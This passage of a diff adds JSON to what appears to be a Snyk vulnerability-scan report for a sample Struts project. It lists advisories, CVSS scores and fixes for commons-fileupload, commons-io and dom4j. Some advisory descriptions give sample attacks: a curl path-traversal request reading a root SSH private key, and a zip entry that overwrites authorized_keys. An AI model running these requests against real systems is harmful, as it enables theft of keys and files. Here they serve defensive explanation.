"2016-06-22T16:51:56Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "commons-fileupload", + "artifactId": "commons-fileupload" + }, + "publicationTime": "2016-12-25T16:51:56Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:46.791816Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20", + "commons-fileupload:commons-fileupload@1.3.1" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.30", + "commons-fileupload:commons-fileupload@1.3.2" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "commons-fileupload:commons-fileupload", + "version": "1.3.1" + }, + { + "id": "SNYK-JAVA-COMMONSFILEUPLOAD-30401", + "title": "Arbitrary Code Execution", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[1.1,1.3.3)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "1.3.3" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [ + { + "version": [ + "[1.1,1.3.3)" + ], + "functionId": { + "filePath": "org/apache/commons/fileupload/disk/DiskFileItem.java", + "className": "DiskFileItem", + "functionName": "readObject" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "commons-fileupload:commons-fileupload", + "references": [ + { + "url": "https://github.com/apache/commons-fileupload/blob/master/src/changes/changes.xml%23L65", + "title": "Github ChangeLog" + }, + { + "url": "https://github.com/apache/commons-fileupload/commit/388e824518697c2c8f9f83fd964621d9c2f8fc4c", + "title": "GitHub Commit" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-1000031", + "title": "NVD" + }, + { + "url": "http://www.tenable.com/security/research/tra-2016-12", + "title": "Tenable Security" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:46:31.745804Z" + }, + { + "assigner": "SUSE", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:50:04.225757Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:53:55.666846Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:58.367467Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:31.745804Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "SUSE", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:50:04.225757Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:55.666846Z" + } + ], + "description": "## Overview\n[`commons-fileupload:commons-fileupload`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22commons-fileupload%22)\nThe Apache Commons FileUpload library contains a Java Object that, upon deserialization, can be manipulated to write or copy files in arbitrary locations. If integrated with [`ysoserial`](https://github.com/frohoff/ysoserial), it is possible to upload and execute binaries in a single deserialization call.\n\n# Details\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n- Apache Blog\n\n## Remediation\nUpgrade `commons-fileupload` to version 1.3.3 or higher.\n\n\n## References\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-1000031)\n- [Tenable Security](http://www.tenable.com/security/research/tra-2016-12)\n- [Github ChangeLog](https://github.com/apache/commons-fileupload/blob/master/src/changes/changes.xml#L65)\n- [Github Commit](https://github.com/apache/commons-fileupload/commit/388e824518697c2c8f9f83fd964621d9c2f8fc4c)\n", + "epssDetails": { + "percentile": "0.93419", + "probability": "0.05866", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-1000031" + ], + "CWE": [ + "CWE-284" + ] + }, + "packageName": "commons-fileupload:commons-fileupload", + "proprietary": false, + "creationTime": "2017-02-22T07:28:18.753000Z", + "functions_new": [ + { + "version": [ + "[1.1,1.3.3)" + ], + "functionId": { + "className": "org.apache.commons.fileupload.disk.DiskFileItem", + "functionName": "readObject" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2016-10-25T14:29:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "commons-fileupload", + "artifactId": "commons-fileupload" + }, + "publicationTime": "2016-10-26T03:04:11.895000Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:55.666846Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20", + "commons-fileupload:commons-fileupload@1.3.1" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.37", + "commons-fileupload:commons-fileupload@1.4" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "commons-fileupload:commons-fileupload", + "version": "1.3.1" + }, + { + "id": "SNYK-JAVA-COMMONSFILEUPLOAD-31540", + "title": "Information Exposure", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,1.3.2)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "1.3.2" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 6.5, + "functions": [ + { + "version": [ + "[1.2.0 ,1.3.2)" + ], + "functionId": { + "filePath": "org/apache/commons/fileupload/FileUploadBase$FileItemIteratorImpl.java", + "className": "FileUploadBase$FileItemIteratorImpl", + "functionName": "" + } + }, + { + "version": [ + "[1.0-rc1,1.2.0)" + ], + "functionId": { + "filePath": "org/apache/commons/fileupload/FileUploadBase.java", + "className": "FileUploadBase", + "functionName": "parseRequest" + } + }, + { + "version": [ + "[,1.0-rc1)" + ], + "functionId": { + "filePath": "org/apache/commons/fileupload/FileUpload.java", + "className": "FileUpload", + "functionName": "parseRequest" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "commons-fileupload:commons-fileupload", + "references": [ + { + "url": "https://github.com/apache/commons-fileupload/blob/master/src/changes/changes.xml%23L56", + "title": "Github ChangeLog" + }, + { + "url": "https://github.com/apache/commons-fileupload/commit/5b4881d7f75f439326f54fa554a9ca7de6d60814", + "title": "GitHub Commit" + } + ], + "cvssDetails": [], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:03:17.073322Z" + } + ], + "description": "## Overview\r\n[`commons-fileupload:commons-fileupload`](https://commons.apache.org/proper/commons-fileupload/) provides a simple yet flexible means of adding support for multipart file upload functionality to servlets and web applications.\r\n\r\nAffected versions of the package are vulnerable to Information Disclosure because the `InputStream` is not closed on exception.\r\n\r\n## Remediation\r\nUpgrade `commons-fileupload` to version 1.3.2 or higher.\r\n\r\n## References\r\n- [Github ChangeLog](https://github.com/apache/commons-fileupload/blob/master/src/changes/changes.xml#L56)\r\n- [Github Commit](https://github.com/apache/commons-fileupload/commit/5b4881d7f75f439326f54fa554a9ca7de6d60814)", + "epssDetails": null, + "identifiers": { + "CVE": [], + "CWE": [ + "CWE-200" + ] + }, + "packageName": "commons-fileupload:commons-fileupload", + "proprietary": false, + "creationTime": "2017-10-01T08:05:48.497000Z", + "functions_new": [ + { + "version": [ + "[1.2.0 ,1.3.2)" + ], + "functionId": { + "className": "org.apache.commons.fileupload.FileUploadBase$FileItemIteratorImpl", + "functionName": "" + } + }, + { + "version": [ + "[1.0-rc1,1.2.0)" + ], + "functionId": { + "className": "org.apache.commons.fileupload.FileUploadBase", + "functionName": "parseRequest" + } + }, + { + "version": [ + "[,1.0-rc1)" + ], + "functionId": { + "className": "org.apache.commons.fileupload.FileUpload", + "functionName": "parseRequest" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2014-02-17T22:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "commons-fileupload", + "artifactId": "commons-fileupload" + }, + "publicationTime": "2017-02-17T08:05:48Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-06T14:03:17.073322Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20", + "commons-fileupload:commons-fileupload@1.3.1" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.30", + "commons-fileupload:commons-fileupload@1.3.2" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "commons-fileupload:commons-fileupload", + "version": "1.3.1" + }, + { + "id": "SNYK-JAVA-COMMONSFILEUPLOAD-3326457", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "credit": [ + "Jakob Ackermann" + ], + "semver": { + "vulnerable": [ + "[1.0-beta-1, 1.5)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "1.5" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 6.5, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "commons-fileupload:commons-fileupload", + "references": [ + { + "url": "https://lists.apache.org/thread/4xl4l09mhwg4vgsk7dxqogcjrobrrdoy", + "title": "Apache Mailing List" + }, + { + "url": "https://github.com/apache/commons-fileupload/commit/0a306f75949f2e9f5f92c400cad39d20117a2eb0", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/commons-fileupload/commit/e20c04990f7420ca917e96a84cec58b13a1b3d17", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/tomcat/commit/063e2e81ede50c287f737cc8e2915ce7217e886e", + "title": "GitHub Commit (Tomcat)" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:52:57.097583Z" + }, + { + "assigner": "SUSE", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:52:59.094771Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 6.5, + "modificationTime": "2024-03-11T09:53:59.806365Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:49.130585Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:57.097583Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "SUSE", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:59.094771Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:59.806365Z" + } + ], + "description": "## Overview\n[commons-fileupload:commons-fileupload](https://mvnrepository.com/artifact/commons-fileupload/commons-fileupload) is a component that provides a simple yet flexible means of adding support for multipart file upload functionality to servlets and web applications.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) when an attacker sends a large number of request parts in a series of uploads or a single multipart upload.\r\n\r\n**NOTE:** After upgrading to the fixed version, the `setFileCountMax()` must be explicitly set to avoid this vulnerability.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `commons-fileupload:commons-fileupload` to version 1.5 or higher.\n## References\n- [Apache Mailing List](https://lists.apache.org/thread/4xl4l09mhwg4vgsk7dxqogcjrobrrdoy)\n- [GitHub Commit](https://github.com/apache/commons-fileupload/commit/0a306f75949f2e9f5f92c400cad39d20117a2eb0)\n- [GitHub Commit](https://github.com/apache/commons-fileupload/commit/e20c04990f7420ca917e96a84cec58b13a1b3d17)\n- [GitHub Commit (Tomcat)](https://github.com/apache/tomcat/commit/063e2e81ede50c287f737cc8e2915ce7217e886e)\n", + "epssDetails": { + "percentile": "0.91407", + "probability": "0.03359", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2023-24998" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "commons-fileupload:commons-fileupload", + "proprietary": false, + "creationTime": "2023-02-21T08:19:49.294883Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2023-02-21T08:00:22Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "commons-fileupload", + "artifactId": "commons-fileupload" + }, + "publicationTime": "2023-02-21T09:23:34.093821Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:59.806365Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20", + "commons-fileupload:commons-fileupload@1.3.1" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@6.1.2", + "commons-fileupload:commons-fileupload@1.5" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "commons-fileupload:commons-fileupload", + "version": "1.3.1" + }, + { + "id": "SNYK-JAVA-COMMONSIO-1277109", + "title": "Directory Traversal", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N/E:F", + "credit": [ + "Lukas Euler" + ], + "semver": { + "vulnerable": [ + "[0, 2.7)" + ] + }, + "exploit": "Functional", + "fixedIn": [ + "2.7" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "commons-io:commons-io", + "references": [ + { + "url": "https://github.com/apache/commons-io/commit/fe7543eee5cd4b2f9e78aa44c31031b68eba204d", + "title": "GitHub Commit" + }, + { + "url": "https://issues.apache.org/jira/browse/IO-556", + "title": "Jira Issue" + }, + { + "url": "https://github.com/AlAIAL90/CVE-2021-29425", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "SUSE", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", + "cvssV3BaseScore": 4.3, + "modificationTime": "2024-03-11T09:49:20.715148Z" + }, + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N", + "cvssV3BaseScore": 4.8, + "modificationTime": "2024-03-11T09:51:34.519777Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N", + "cvssV3BaseScore": 4.8, + "modificationTime": "2024-03-11T09:53:56.345148Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N/E:F", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:04:37.151008Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", + "assigner": "SUSE", + "severity": "medium", + "baseScore": 4.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:20.715148Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 4.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:34.519777Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 4.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:56.345148Z" + } + ], + "description": "## Overview\n[commons-io:commons-io](https://search.maven.org/artifact/commons-io/commons-io) is a The Apache Commons IO library contains utility classes, stream implementations, file filters, file comparators, endian transformation classes, and much more.\n\nAffected versions of this package are vulnerable to Directory Traversal via calling the method FileNameUtils.normalize using an improper string like `//../foo` or `\\\\..\\foo`, which may allow access to files in the parent directory.\n\n## Details\n\nA Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with \"dot-dot-slash (../)\" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.\n\nDirectory Traversal vulnerabilities can be generally divided into two types:\n\n- **Information Disclosure**: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.\n\n`st` is a module for serving static files on web pages, and contains a [vulnerability of this type](https://snyk.io/vuln/npm:st:20140206). In our example, we will serve files from the `public` route.\n\nIf an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.\n\n```\ncurl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa\n```\n**Note** `%2e` is the URL encoded version of `.` (dot).\n\n- **Writing arbitrary files**: Allows the attacker to create or replace existing files. This type of vulnerability is also known as `Zip-Slip`. \n\nOne way to achieve this is by using a malicious `zip` archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.\n\nThe following is an example of a `zip` archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in `/root/.ssh/` overwriting the `authorized_keys` file:\n\n```\n2018-04-15 22:04:29 ..... 19 19 good.txt\n2018-04-15 22:04:42 ..... 20 20 ../../../../../../root/.ssh/authorized_keys\n```\n\n## Remediation\nUpgrade `commons-io:commons-io` to version 2.7 or higher.\n## References\n- [GitHub Commit](https://github.com/apache/commons-io/commit/fe7543eee5cd4b2f9e78aa44c31031b68eba204d)\n- [Jira Issue](https://issues.apache.org/jira/browse/IO-556)\n- [PoC](https://github.com/AlAIAL90/CVE-2021-29425)\n", + "epssDetails": { + "percentile": "0.54510", + "probability": "0.00171", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2021-29425" + ], + "CWE": [ + "CWE-20", + "CWE-22" + ], + "GHSA": [ + "GHSA-gwrp-pvrq-jmwv" + ] + }, + "packageName": "commons-io:commons-io", + "proprietary": false, + "creationTime": "2021-04-27T10:51:05.462338Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2021-04-26T16:04:00Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Functional", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "commons-io", + "artifactId": "commons-io" + }, + "publicationTime": "2021-04-27T14:26:12Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:56.345148Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20", + "commons-io:commons-io@2.2" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@6.0.0", + "commons-io:commons-io@2.9.0" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "commons-io:commons-io", + "version": "2.2" + }, + { + "id": "SNYK-JAVA-DOM4J-174153", + "title": "XML External Entity (XXE) Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N/E:P", + "credit": [ + "Mario Areias" + ], + "semver": { + "vulnerable": [ + "[0,]" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [ + { + "version": [ + "[0,]" + ], + "functionId": { + "filePath": "org/dom4j/Namespace.java", + "className": "Namespace", + "functionName": "" + } + }, + { + "version": [ + "[0,]" + ], + "functionId": { + "filePath": "org/dom4j/QName.java", + "className": "QName", + "functionName": "" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "dom4j:dom4j", + "references": [ + { + "url": "https://github.com/dom4j/dom4j/commit/e598eb43d418744c4dbf62f647dd2381c9ce9387", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/dom4j/dom4j/issues/48", + "title": "GitHub Issue" + }, + { + "url": "https://ihacktoprotect.com/post/dom4j-xml-injection/", + "title": "POC: Ihacktoprotect Blog" + } + ], + "cvssDetails": [ + { + "assigner": "SUSE", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", + "cvssV3BaseScore": 6.1, + "modificationTime": "2024-03-11T09:46:26.800032Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:47:19.987177Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:53:54.900402Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N/E:P", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:00:55.789489Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", + "assigner": "SUSE", + "severity": "medium", + "baseScore": 6.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:26.800032Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:19.987177Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:54.900402Z" + } + ], + "description": "## Overview\n[dom4j:dom4j](https://github.com/dom4j/dom4j) is a flexible XML framework for Java. *Note*: this artifact has been deprecated for `org.dom4j:dom4j`.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection due to improper validation of the `QName` inputs.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nThere is no fixed version for `dom4j:dom4j`.\n\n## References\n- [GitHub Commit](https://github.com/dom4j/dom4j/commit/e598eb43d418744c4dbf62f647dd2381c9ce9387)\n- [GitHub Issue](https://github.com/dom4j/dom4j/issues/48)\n- [POC: Ihacktoprotect Blog](https://ihacktoprotect.com/post/dom4j-xml-injection/)\n", + "epssDetails": { + "percentile": "0.70906", + "probability": "0.00325", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-1000632" + ], + "CWE": [ + "CWE-611" + ], + "GHSA": [ + "GHSA-6pcc-3rfx-4gpm" + ] + }, + "packageName": "dom4j:dom4j", + "proprietary": false, + "creationTime": "2019-04-10T16:07:04.634619Z", + "functions_new": [ + { + "version": [ + "[0,]" + ], + "functionId": { + "className": "org.dom4j.Namespace", + "functionName": "" + } + }, + { + "version": [ + "[0,]" + ], + "functionId": { + "className": "org.dom4j.QName", + "functionName": 